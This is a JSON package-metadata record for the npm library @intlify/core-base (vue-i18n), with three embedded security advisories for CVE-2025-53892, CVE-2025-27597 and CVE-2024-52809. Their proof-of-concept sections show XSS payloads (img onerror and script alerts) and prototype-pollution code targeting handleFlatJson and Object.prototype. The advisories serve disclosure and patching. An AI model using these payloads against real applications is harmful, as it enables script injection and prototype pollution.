{"id":992289,"name":"@intlify/core-base","ecosystem":"npm","description":"@intlify/core-base","homepage":"https://github.com/intlify/vue-i18n/tree/master/packages/core-base#readme","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/intlify/vue-i18n","keywords_array":["core","fundamental","i18n","internationalization","intlify"],"namespace":"intlify","versions_count":211,"first_release_published_at":"2020-12-15T05:58:56.756Z","latest_release_published_at":"2026-06-18T02:13:33.524Z","latest_release_number":"11.4.6","last_synced_at":"2026-06-28T16:13:50.188Z","created_at":"2022-04-07T18:43:44.145Z","updated_at":"2026-06-29T04:12:25.331Z","registry_url":"https://www.npmjs.com/package/@intlify/core-base","install_command":"npm install @intlify/core-base","documentation_url":null,"metadata":{"funding":"https://github.com/sponsors/kazupon","dist-tags":{"rc":"9.0.0-rc.9","alpha":"9.2.0-alpha.9","edge":"9.3.0-beta.14-77e850b","beta":"9.3.0-beta.27","stable":"11.1.2","legacy10":"10.0.8","legacy9":"9.14.5","next":"12.0.0-alpha.4","latest":"11.4.6"}},"repo_metadata":{"id":37655382,"uuid":"231953283","full_name":"intlify/vue-i18n","owner":"intlify","description":"Vue I18n for Vue 3","archived":false,"fork":false,"pushed_at":"2026-06-19T08:38:44.000Z","size":31383,"stargazers_count":2696,"open_issues_count":90,"forks_count":386,"subscribers_count":12,"default_branch":"master","last_synced_at":"2026-06-19T19:23:50.263Z","etag":null,"topics":["i18n","internationalization","library","plugin","vue","vue3","vuejs"],"latest_commit_sha":null,"homepage":"https://vue-i18n.intlify.dev","language":"TypeScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/intlify.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG.md","contributing":".github/CONTRIBUTING.md","funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":"CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null},"funding":{"github":"kazupon","patreon":null,"open_collective":null,"ko_fi":null,"tidelift":null,"issuehunt":null,"custom":null}},"created_at":"2020-01-05T17:38:06.000Z","updated_at":"2026-06-19T08:30:50.000Z","dependencies_parsed_at":"2022-07-10T20:16:53.153Z","dependency_job_id":"333fa441-7dd1-4f06-8192-ec82f7a72b6e","html_url":"https://github.com/intlify/vue-i18n","commit_stats":{"total_commits":2476,"total_committers":217,"mean_commits":"11.410138248847927","dds":"0.22132471728594505","last_synced_commit":"75028629977012d5545d7121124add08eb9f9e17"},"previous_names":["intlify/vue-i18n-next"],"tags_count":230,"template":false,"template_full_name":null,"purl":"pkg:github/intlify/vue-i18n","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/intlify%2Fvue-i18n","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/intlify%2Fvue-i18n/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/intlify%2Fvue-i18n/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/intlify%2Fvue-i18n/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/intlify","download_url":"https://codeload.github.com/intlify/vue-i18n/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/intlify%2Fvue-i18n/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":34548118,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-05-26T15:22:16.424Z","status":"online","status_checked_at":"2026-06-19T02:00:06.005Z","response_time":61,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"tags":[]},"repo_metadata_updated_at":"2026-06-28T16:22:49.561Z","dependent_packages_count":26,"downloads":12361976,"downloads_period":"last-month","dependent_repos_count":6081,"rankings":{"downloads":0.19669103696020643,"dependent_repos_count":0.3197307385371844,"dependent_packages_count":0.9768329846697239,"stargazers_count":2.157220618160886,"forks_count":2.191401669310892,"docker_downloads_count":0.30225220149073523,"average":1.0240215415216047},"purl":"pkg:npm/%40intlify/core-base","advisories":[{"uuid":"GSA_kwCzR0hTQS14OHFwLXdxcW0tNTdwaM4ABKPO","url":"https://github.com/advisories/GHSA-x8qp-wqqm-57ph","title":"vue-i18n's escapeParameterHtml does not prevent DOM-based XSS through its tag attributes","description":"### Summary\nThe escapeParameterHtml: true option in Vue I18n is designed to protect against HTML/script injection by escaping interpolated parameters. However, this setting fails to prevent execution of certain tag-based payloads, such as `\u003cimg src=x onerror=...\u003e`, if the interpolated value is inserted inside an HTML context using v-html.\n\nThis may lead to a DOM-based XSS vulnerability, even when using escapeParameterHtml: true, if a translation string includes minor HTML and is rendered via v-html.\n\n### Details\n\nWhen escapeParameterHtml: true is enabled, it correctly escapes common injection points.\n\nHowever, it does not sanitize entire attribute contexts, which can be used as XSS vectors via:\n\n`\u003cimg src=x onerror=alert(1)\u003e\n`\n### PoC\nIn your Vue I18n configuration:\n\n```\nconst i18n = createI18n({\n  escapeParameterHtml: true,\n  messages: {\n    en: {\n      vulnerable: 'Caution: \u003cimg src=x onerror=\"{payload}\"\u003e'\n    }\n  }\n});\n```\nUse this interpolated payload:\n\n`const payload = '\u003cscript\u003ealert(\"xss\")\u003c/script\u003e';`\nRender the translation using v-html (even not using v-html):\n\n`\u003cp v-html=\"$t('vulnerable', { payload })\"\u003e\u003c/p\u003e\n`\nExpected: escaped content should render as text, not execute.\n\nActual: script executes in some environments (or the payload is partially parsed as HTML).\n\n### Impact\n\nThis creates a DOM-based Cross-Site Scripting (XSS) vulnerability despite enabling a security option (escapeParameterHtml) .","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2025-07-16T19:32:48.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":5.3,"cvss_vector":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N","references":["https://github.com/intlify/vue-i18n/security/advisories/GHSA-x8qp-wqqm-57ph","https://nvd.nist.gov/vuln/detail/CVE-2025-53892","https://github.com/intlify/vue-i18n/pull/2229","https://github.com/intlify/vue-i18n/pull/2230","https://github.com/intlify/vue-i18n/commit/49f982443ab8fd94ecc427b265ce97d57df94d7e","https://github.com/intlify/vue-i18n/commit/a47099619fb9b256e86341a8658ebe72e92ab099","https://github.com/intlify/vue-i18n/releases/tag/v10.0.8","https://github.com/intlify/vue-i18n/releases/tag/v11.1.10","https://github.com/intlify/vue-i18n/releases/tag/v9.14.5","https://github.com/advisories/GHSA-x8qp-wqqm-57ph"],"source_kind":"github","identifiers":["GHSA-x8qp-wqqm-57ph","CVE-2025-53892"],"repository_url":"https://github.com/intlify/vue-i18n","blast_radius":24.522486144668587,"created_at":"2025-07-16T20:08:14.500Z","updated_at":"2026-06-29T04:03:40.741Z","epss_percentage":0.0067,"epss_percentile":0.47119,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS14OHFwLXdxcW0tNTdwaM4ABKPO","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS14OHFwLXdxcW0tNTdwaM4ABKPO","packages":[{"ecosystem":"npm","package_name":"petite-vue-i18n","versions":[{"first_patched_version":"11.1.10","vulnerable_version_range":"\u003e= 11.0.0, \u003c 11.1.10"},{"first_patched_version":"10.0.8","vulnerable_version_range":"\u003e= 10.0.0, \u003c 10.0.8"}],"purl":"pkg:npm/petite-vue-i18n"},{"ecosystem":"npm","package_name":"@intlify/vue-i18n-core","versions":[{"first_patched_version":"11.1.10","vulnerable_version_range":"\u003e= 11.0.0, \u003c 11.1.10"},{"first_patched_version":"10.0.8","vulnerable_version_range":"\u003e= 10.0.0, \u003c 10.0.8"},{"first_patched_version":"9.14.5","vulnerable_version_range":"\u003e= 9.2.0, \u003c 9.14.5"}],"purl":"pkg:npm/%40intlify%2Fvue-i18n-core"},{"ecosystem":"npm","package_name":"@intlify/core-base","versions":[{"first_patched_version":"11.1.10","vulnerable_version_range":"\u003e= 11.0.0, \u003c 11.1.10"},{"first_patched_version":"10.0.8","vulnerable_version_range":"\u003e= 10.0.0, \u003c 10.0.8"},{"first_patched_version":"9.14.5","vulnerable_version_range":"\u003e= 9.0.0, \u003c 9.14.5"}],"purl":"pkg:npm/%40intlify%2Fcore-base"},{"ecosystem":"npm","package_name":"@intlify/core","versions":[{"first_patched_version":"11.1.10","vulnerable_version_range":"\u003e= 11.0.0, \u003c 11.1.10"},{"first_patched_version":"10.0.8","vulnerable_version_range":"\u003e= 10.0.0, \u003c 10.0.8"},{"first_patched_version":"9.14.5","vulnerable_version_range":"\u003e= 9.0.0, \u003c 9.14.5"}],"purl":"pkg:npm/%40intlify%2Fcore"},{"ecosystem":"npm","package_name":"vue-i18n","versions":[{"first_patched_version":"11.1.10","vulnerable_version_range":"\u003e= 11.0.0, \u003c 11.1.10"},{"first_patched_version":"10.0.8","vulnerable_version_range":"\u003e= 10.0.0, \u003c 10.0.8"},{"first_patched_version":"9.14.5","vulnerable_version_range":"\u003e= 9.0.0, \u003c 9.14.5"}],"purl":"pkg:npm/vue-i18n"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS14OHFwLXdxcW0tNTdwaM4ABKPO/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1wMnBoLTdnOTMtaHczbc4ABFM8","url":"https://github.com/advisories/GHSA-p2ph-7g93-hw3m","title":"Vue I18n Allows Prototype Pollution in `handleFlatJson`","description":"**Vulnerability type:**\nPrototype Pollution\n\n**Vulnerability Location(s):**\n```js\n# v9.1\nnode_modules/@intlify/message-resolver/index.js\n\n# v9.2 or later\nnode_modules/@intlify/vue-i18n-core/index.js\n```\n\n**Description:**\n\nThe latest version of `@intlify/message-resolver (9.1)` and `@intlify/vue-i18n-core (9.2 or later)`, (previous versions might also affected), is vulnerable to Prototype Pollution through the entry function(s) `handleFlatJson`. An attacker can supply a payload with Object.prototype setter to introduce or modify properties within the global prototype chain, causing denial of service (DoS) a the minimum consequence.\n\nMoreover, the consequences of this vulnerability can escalate to other injection-based attacks, depending on how the library integrates within the application. For instance, if the polluted property propagates to sensitive Node.js APIs (e.g., exec, eval), it could enable an attacker to execute arbitrary commands within the application's context.\n\n\n**PoC:**\n\n```bash\n// install the package with the latest version\n~$ npm install @intlify/message-resolver@9.1.10\n// run the script mentioned below \n~$ node poc.js\n//The expected output (if the code still vulnerable) is below. \n// Note that the output may slightly differs from function to another.\nBefore Attack:  {}\nAfter Attack:  {\"pollutedKey\":123}\n```\n\n```js\n// poc.js\n(async () =\u003e {\n    const lib = await import('@intlify/message-resolver');\n    var someObj = {}\n    console.log(\"Before Attack: \", JSON.stringify({}.__proto__));\n    try {\n        // for multiple functions, uncomment only one for each execution.\n        lib.handleFlatJson ({ \"__proto__.pollutedKey\": \"pollutedValue\" })\n    } catch (e) { }\n    console.log(\"After Attack: \", JSON.stringify({}.__proto__));\n    delete Object.prototype.pollutedKey;\n})();\n```","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2025-03-07T15:58:24.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":8.9,"cvss_vector":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P","references":["https://github.com/intlify/vue-i18n/security/advisories/GHSA-p2ph-7g93-hw3m","https://github.com/intlify/vue-i18n/commit/d21e06a7440eed8ada7f522b22fcf830b98d3a53","https://github.com/intlify/vue-i18n/commit/fbda9988d3ddd3a1a21740d506d2c183d6b6e36a","https://github.com/intlify/vue-i18n/commit/feaf13fcff427f2cb1d5ec8076e639506ba28f9e","https://github.com/intlify/vue-i18n/releases/tag/v10.0.6","https://github.com/intlify/vue-i18n/releases/tag/v11.1.2","https://github.com/intlify/vue-i18n/releases/tag/v9.14.3","https://nvd.nist.gov/vuln/detail/CVE-2025-27597","https://github.com/intlify/vue-i18n/commit/4bb6eacda7fc2cde5687549afa0efb27ca40862a","https://github.com/advisories/GHSA-p2ph-7g93-hw3m"],"source_kind":"github","identifiers":["GHSA-p2ph-7g93-hw3m","CVE-2025-27597"],"repository_url":"https://github.com/intlify/vue-i18n","blast_radius":41.179269186330274,"created_at":"2025-03-07T16:08:12.387Z","updated_at":"2026-06-24T03:04:22.270Z","epss_percentage":0.00557,"epss_percentile":0.42,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1wMnBoLTdnOTMtaHczbc4ABFM8","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1wMnBoLTdnOTMtaHczbc4ABFM8","packages":[{"ecosystem":"npm","package_name":"vue-i18n","versions":[{"first_patched_version":"11.1.2","vulnerable_version_range":"\u003e= 11.0.0-beta.0, \u003c 11.1.2"},{"first_patched_version":"10.0.6","vulnerable_version_range":"\u003e= 10.0.0-alpha.1, \u003c 10.0.6"},{"first_patched_version":"9.14.3","vulnerable_version_range":"\u003e= 9.1.0, \u003c 9.14.3"}],"purl":"pkg:npm/vue-i18n"},{"ecosystem":"npm","package_name":"petite-vue-i18n","versions":[{"first_patched_version":"11.1.2","vulnerable_version_range":"\u003e= 11.0.0-beta.0, \u003c 11.1.2"},{"first_patched_version":"10.0.6","vulnerable_version_range":"\u003e= 10.0.0, \u003c 10.0.6"}],"purl":"pkg:npm/petite-vue-i18n"},{"ecosystem":"npm","package_name":"@intlify/vue-i18n-core","versions":[{"first_patched_version":"11.1.2","vulnerable_version_range":"\u003e= 11.0.0-beta.0, \u003c 11.1.2"},{"first_patched_version":"11.1.2","vulnerable_version_range":"\u003e= 10.0.0-alpha.1, \u003c 10.0.6"},{"first_patched_version":"9.14.3","vulnerable_version_range":"\u003e= 9.2.0, \u003c 9.14.3"}],"purl":"pkg:npm/%40intlify%2Fvue-i18n-core"},{"ecosystem":"npm","package_name":"@intlify/core","versions":[{"first_patched_version":"9.1.11","vulnerable_version_range":"\u003e= 9.1.0, \u003c 9.1.11"}],"purl":"pkg:npm/%40intlify%2Fcore"},{"ecosystem":"npm","package_name":"@intlify/core-base","versions":[{"first_patched_version":"9.1.11","vulnerable_version_range":"\u003e= 9.1.0, \u003c 9.1.11"}],"purl":"pkg:npm/%40intlify%2Fcore-base"},{"ecosystem":"npm","package_name":"@intlify/message-resolver","versions":[{"first_patched_version":"9.1.11","vulnerable_version_range":"\u003e= 9.1.0, \u003c 9.1.11"}],"purl":"pkg:npm/%40intlify%2Fmessage-resolver"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1wMnBoLTdnOTMtaHczbc4ABFM8/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS05cjltLWZmcDYtOXg0ds4ABB_G","url":"https://github.com/advisories/GHSA-9r9m-ffp6-9x4v","title":"vue-i18n has cross-site scripting vulnerability with prototype pollution","description":"### Vulnerability type\nXSS\n\n### Description\nvue-i18n can be passed locale messages to `createI18n` or `useI18n`.\nwe can then translate them using `t` and `$t`.\nvue-i18n has its own syntax for local messages, and uses a message compiler to generate AST.\nIn order to maximize the performance of the translation function, vue-i18n uses bundler plugins such as `@intlify/unplugin-vue-i18n` and bulder to convert the AST in advance when building the application.\nBy using that AST as the locale message, it is no longer necessary to compile, and it is possible to translate using the AST.\n\nThe AST generated by the message compiler has special properties for each node in the AST tree to maximize performance. In the PoC example below, it is a `static` property, but that is just one of the optimizations.\nAbout details of special properties, see https://github.com/intlify/vue-i18n/blob/master/packages/message-compiler/src/nodes.ts\n\nIn general, the locale messages of vue-i18n are optimized during production builds using `@intlify/unplugin-vue-i18n`,\nso there is always a property that is attached during optimization like this time.\nBut if you are using a locale message AST in development mode or your own, there is a possibility of XSS if a third party injects.\n\n### Reproduce (PoC)\n```html\n\u003c!doctype html\u003e\n\u003chtml\u003e\n  \u003chead\u003e\n    \u003cmeta charset=\"utf-8\" /\u003e\n    \u003ctitle\u003evue-i18n XSS\u003c/title\u003e\n    \u003cscript src=\"https://unpkg.com/vue@3\"\u003e\u003c/script\u003e\n    \u003cscript src=\"https://unpkg.com/vue-i18n@10\"\u003e\u003c/script\u003e\n    \u003c!-- Scripts that perform prototype contamination, such as being distributed from malicious hosting sites or injected through supply chain attacks, etc. --\u003e\n    \u003cscript\u003e\n      /**\n       * Prototype pollution vulnerability with `Object.prototype`.\n       * The 'static' property is part of the optimized AST generated by the vue-i18n message compiler.\n       * About details of special properties, see https://github.com/intlify/vue-i18n/blob/master/packages/message-compiler/src/nodes.ts\n       *\n       * In general, the locale messages of vue-i18n are optimized during production builds using `@intlify/unplugin-vue-i18n`,\n       * so there is always a property that is attached during optimization like this time.\n       * But if you are using a locale message AST in development or your own, there is a possibility of XSS if a third party injects prototype pollution code.\n       */\n      Object.defineProperty(Object.prototype, 'static', {\n        configurable: true,\n        get() {\n          alert('prototype polluted!')\n          return 'prototype pollution'\n        }\n      })\n    \u003c/script\u003e \n \u003c/head\u003e\n  \u003cbody\u003e\n    \u003cdiv id=\"app\"\u003e\n      \u003cp\u003e{{ t('hello') }}\u003c/p\u003e\n    \u003c/div\u003e\n    \u003cscript\u003e\n      const { createApp } = Vue\n      const { createI18n, useI18n } = VueI18n\n\n      // AST style locale message, which build by `@intlify/unplugin-vue-i18n`\n      const en = {\n        hello: {\n          type: 0,\n          body: {\n            items: [\n              {\n                type: 3,\n                value: 'hello world!'\n              }\n            ]\n          }\n        }\n      }\n\n      const i18n = createI18n({\n        legacy: false,\n        locale: 'en',\n        messages: {\n          en\n        }\n      })\n\n      const app = createApp({\n        setup() {\n          const { t } = useI18n()\n          return { t }\n        }\n      })\n      app.use(i18n)\n      app.mount('#app')\n    \u003c/script\u003e\n  \u003c/body\u003e\n\u003c/html\u003e\n```\n\n### Workarounds\nBefore v10.0.0, we can work around this vulnerability by using the regular compilation (`jit: false` of `@intlify/unplugin-vue-i18n` plugin configuration) way instead of jit compilation.\n- jit compilation: https://vue-i18n.intlify.dev/guide/advanced/optimization.html#jit-compilation\n- bundler plugin option: https://github.com/intlify/bundle-tools/tree/main/packages/unplugin-vue-i18n#jitcompilation\n\n### References\n- [Simillar case: Vue 2 XSS vulnerability with prototype pollution](https://www.herodevs.com/vulnerability-directory/cve-2024-6783)\n","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2024-12-02T17:26:20.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":5.3,"cvss_vector":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","references":["https://github.com/intlify/vue-i18n/security/advisories/GHSA-9r9m-ffp6-9x4v","https://nvd.nist.gov/vuln/detail/CVE-2024-52809","https://github.com/intlify/vue-i18n/commit/72f0d323006fc7363b18cab62d4522dadd874411","https://github.com/intlify/vue-i18n/commit/9f20909ef8c9232a1072d7818e12ed6d6451024d","https://github.com/advisories/GHSA-9r9m-ffp6-9x4v"],"source_kind":"github","identifiers":["GHSA-9r9m-ffp6-9x4v","CVE-2024-52809"],"repository_url":"https://github.com/intlify/vue-i18n","blast_radius":24.522486144668587,"created_at":"2024-12-02T18:09:57.541Z","updated_at":"2026-06-26T02:04:51.506Z","epss_percentage":0.00647,"epss_percentile":0.46217,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS05cjltLWZmcDYtOXg0ds4ABB_G","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS05cjltLWZmcDYtOXg0ds4ABB_G","packages":[{"ecosystem":"npm","package_name":"@intlify/vue-i18n-core","versions":[{"first_patched_version":"10.0.5","vulnerable_version_range":"\u003e= 10.0.0, \u003c 10.0.5"},{"first_patched_version":"9.14.2","vulnerable_version_range":"\u003e= 9.3.0, \u003c 9.14.2"}],"purl":"pkg:npm/%40intlify%2Fvue-i18n-core"},{"ecosystem":"npm","package_name":"@intlify/core","versions":[{"first_patched_version":"10.0.5","vulnerable_version_range":"\u003e= 10.0.0, \u003c 10.0.5"},{"first_patched_version":"9.14.2","vulnerable_version_range":"\u003e= 9.3.0, \u003c 9.14.2"}],"purl":"pkg:npm/%40intlify%2Fcore"},{"ecosystem":"npm","package_name":"vue-i18n","versions":[{"first_patched_version":"10.0.5","vulnerable_version_range":"\u003e= 10.0.0, \u003c 10.0.5"},{"first_patched_version":"9.14.2","vulnerable_version_range":"\u003e= 9.3.0, \u003c 9.14.2"}],"purl":"pkg:npm/vue-i18n"},{"ecosystem":"npm","package_name":"@intlify/core-base","versions":[{"first_patched_version":"10.0.5","vulnerable_version_range":"\u003e= 10.0.0, \u003c 10.0.5"},{"first_patched_version":"9.14.2","vulnerable_version_range":"\u003e= 9.3.0, \u003c 9.14.2"}],"purl":"pkg:npm/%40intlify%2Fcore-base"},{"ecosystem":"npm","package_name":"petite-vue-i18n","versions":[{"first_patched_version":"10.0.5","vulnerable_version_range":"\u003e= 10.0.0, \u003c 10.0.5"}],"purl":"pkg:npm/petite-vue-i18n"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS05cjltLWZmcDYtOXg0ds4ABB_G/related_packages","related_advisories":[]}],"docker_usage_url":"https://docker.ecosyste.ms/usage/npm/@intlify/core-base","docker_dependents_count":196,"docker_downloads_count":41862941,"usage_url":"https://repos.ecosyste.ms/usage/npm/@intlify/core-base","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/npm/@intlify/core-base/dependencies","status":null,"funding_links":["https://github.com/sponsors/kazupon"],"critical":null,"issue_metadata":{"last_synced_at":"2026-06-18T20:13:21.533Z","issues_count":147,"pull_requests_count":580,"avg_time_to_close_issue":12042285.156626506,"avg_time_to_close_pull_request":1247439.4138702461,"issues_closed_count":83,"pull_requests_closed_count":447,"pull_request_authors_count":45,"issue_authors_count":121,"avg_comments_per_issue":2.727891156462585,"avg_comments_per_pull_request":2.0620689655172413,"merged_pull_requests_count":378,"bot_issues_count":3,"bot_pull_requests_count":317,"past_year_issues_count":22,"past_year_pull_requests_count":141,"past_year_avg_time_to_close_issue":4346945.416666667,"past_year_avg_time_to_close_pull_request":336950.9375,"past_year_issues_closed_count":12,"past_year_pull_requests_closed_count":64,"past_year_pull_request_authors_count":18,"past_year_issue_authors_count":22,"past_year_avg_comments_per_issue":3.5,"past_year_avg_comments_per_pull_request":3.148936170212766,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":95,"past_year_merged_pull_requests_count":50,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/intlify%2Fvue-i18n/issues","maintainers":[{"login":"kazupon","count":155,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kazupon"},{"login":"BobbieGoede","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/BobbieGoede"},{"login":"infra-blue","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/infra-blue"}],"active_maintainers":[{"login":"kazupon","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kazupon"},{"login":"BobbieGoede","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/BobbieGoede"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@intlify%2Fcore-base/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@intlify%2Fcore-base/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@intlify%2Fcore-base/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@intlify%2Fcore-base/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@intlify%2Fcore-base/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@intlify%2Fcore-base/codemeta","maintainers":[{"uuid":"kazupon","login":"kazupon","name":null,"email":"kawakazu80@gmail.com","url":null,"packages_count":203,"html_url":"https://www.npmjs.com/~kazupon","role":null,"created_at":"2022-11-18T19:09:13.336Z","updated_at":"2022-11-18T19:09:13.336Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/kazupon/packages"},{"uuid":"ota-meshi","login":"ota-meshi","name":null,"email":"otameshiyo23@gmail.com","url":null,"packages_count":137,"html_url":"https://www.npmjs.com/~ota-meshi","role":null,"created_at":"2022-11-18T19:09:13.349Z","updated_at":"2022-11-18T19:09:13.349Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/ota-meshi/packages"}]}